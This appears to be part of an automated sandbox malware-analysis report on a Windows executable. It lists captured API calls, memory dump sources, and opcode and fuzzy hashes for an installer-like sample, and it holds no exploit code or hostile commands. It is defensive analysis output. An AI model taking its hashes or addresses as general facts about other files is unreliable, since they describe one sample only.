                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 2547128583-0
                                                                                                              • Opcode ID: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                              • Instruction ID: 5d7b52194fecd52e31197542c52f699420a2dcfb6f4997f05ddeecd74f4f3bdc
                                                                                                              • Opcode Fuzzy Hash: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                              • Instruction Fuzzy Hash: 70E0863660422066D61057705E44D3763AC9E94704306043EFA46F2041DB78DC32AA6E
                                                                                                              APIs
                                                                                                              • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$EnableShow
                                                                                                              • String ID:
                                                                                                              • API String ID: 1136574915-0
                                                                                                              • Opcode ID: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
                                                                                                              • Instruction ID: 46dfe73b81ae29a5099323896a5bc3e3d9df575198e3285abdeb67f25c429c8d
                                                                                                              • Opcode Fuzzy Hash: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
                                                                                                              • Instruction Fuzzy Hash: 76E08C326005009BCB10AFB5AA4999D3375DF90369710007BE402F10E1CABC9C409A2D
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\FILHKLtCw0.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AttributesCreate
                                                                                                              • String ID:
                                                                                                              • API String ID: 415043291-0
                                                                                                              • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                              • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                                                                              • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                              • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                                                                              APIs
                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405706
                                                                                                              • GetLastError.KERNEL32 ref: 00405714
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 1375471231-0
                                                                                                              • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                              • Instruction ID: 3f205c5890689a668e8791f8cf6ed098ce3dcc56284ebb1818e0a19aeae2b5ff
                                                                                                              • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                              • Instruction Fuzzy Hash: DBC04C30225602DADA106F34DE087177951AB90741F1184396146E61A0DA348415E93D
                                                                                                              APIs
                                                                                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                                                                                • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointerwsprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 327478801-0
                                                                                                              • Opcode ID: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                              • Instruction ID: c5c3fa32fc6d0159c61c67e46e8878479b4609e7a69e49ca0ebb3ecbbe822ed2
                                                                                                              • Opcode Fuzzy Hash: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                              • Instruction Fuzzy Hash: A0E04F71702514EFDB01AFA59E4ACAFBB6AEB40328B14443BF501F00E1DA7D8C019A2D
                                                                                                              APIs
                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PrivateProfileStringWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 390214022-0
                                                                                                              • Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                              • Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
                                                                                                              • Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                              • Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNELBASE(00000000,0000046B,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Open
                                                                                                              • String ID:
                                                                                                              • API String ID: 71445658-0
                                                                                                              • Opcode ID: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                              • Instruction ID: 180cb462b76767e938a43b2c67eaf1f9418a6812eb156052446fd1a81c43fca4
                                                                                                              • Opcode Fuzzy Hash: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                              • Instruction Fuzzy Hash: 54E0BF76154108AFDB00DFA5EE46EA977ECAB44704F044025BA09E7191C674E5509768
                                                                                                              APIs
                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A20,000000FF,00416A20,000000FF,000000FF,00000004,00000000), ref: 00405CF0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3934441357-0
                                                                                                              • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                              • Instruction ID: d2761c75b63c3b5a1b4cb2cfb4b6a55fbed1fd27b7f8bdfe76624f6b99830631
                                                                                                              • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                              • Instruction Fuzzy Hash: 2AE0EC3221425AABDF109E55EC08FEB7B6CEF05360F049437FA55E7190D631E921DBA4
                                                                                                              APIs
                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CC1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 2738559852-0
                                                                                                              • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                              • Instruction ID: 881bd9ca443264ea0180802fa9c86a3c9bfb0e6b132b989af4612487e9445b73
                                                                                                              • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                              • Instruction Fuzzy Hash: D1E08632104259ABDF105E518C00AEB376CFB04361F104432F911E3140D630E8119FB4
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2872673692.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2872653525.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2872698277.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2872715437.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_10000000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                              • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                                              • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                              • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                                              APIs
                                                                                                              • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              • Opcode ID: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                              • Instruction ID: 4fb9e9dd77d4d4fa14caa6284e3e33111a790732df8c0ecbc47c365062d5febc
                                                                                                              • Opcode Fuzzy Hash: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                              • Instruction Fuzzy Hash: 4BD05E33B04100DBCB10DFE8AE08ADD77B5AB80338B248177E601F21E4D6B8C650AB1D
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 3850602802-0
                                                                                                              • Opcode ID: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                              • Instruction ID: f9280d834dafdcf82d79e279d22eccff0cbc279b2038abc2a2984d0c0ecbec1f
                                                                                                              • Opcode Fuzzy Hash: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                              • Instruction Fuzzy Hash: E3B01235180A00BBDE114B00EE09F857E62F7EC701F018438B340240F0CBB200A0DB08
                                                                                                              APIs
                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointer
                                                                                                              • String ID:
                                                                                                              • API String ID: 973152223-0
                                                                                                              • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                              • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                                                                              • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                              • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                                                                              APIs
                                                                                                              • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2872673692.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2872653525.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2872698277.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2872715437.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_10000000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocGlobal
                                                                                                              • String ID:
                                                                                                              • API String ID: 3761449716-0
                                                                                                              • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                              • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                                                              • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                              • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                              • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405440
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                                • Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                              • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004054F1
                                                                                                              • ShowWindow.USER32(00000008), ref: 0040553B
                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                              • CreatePopupMenu.USER32 ref: 00405580
                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                              • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                              • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                              • EmptyClipboard.USER32 ref: 0040561B
                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                              • CloseClipboard.USER32 ref: 00405676
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
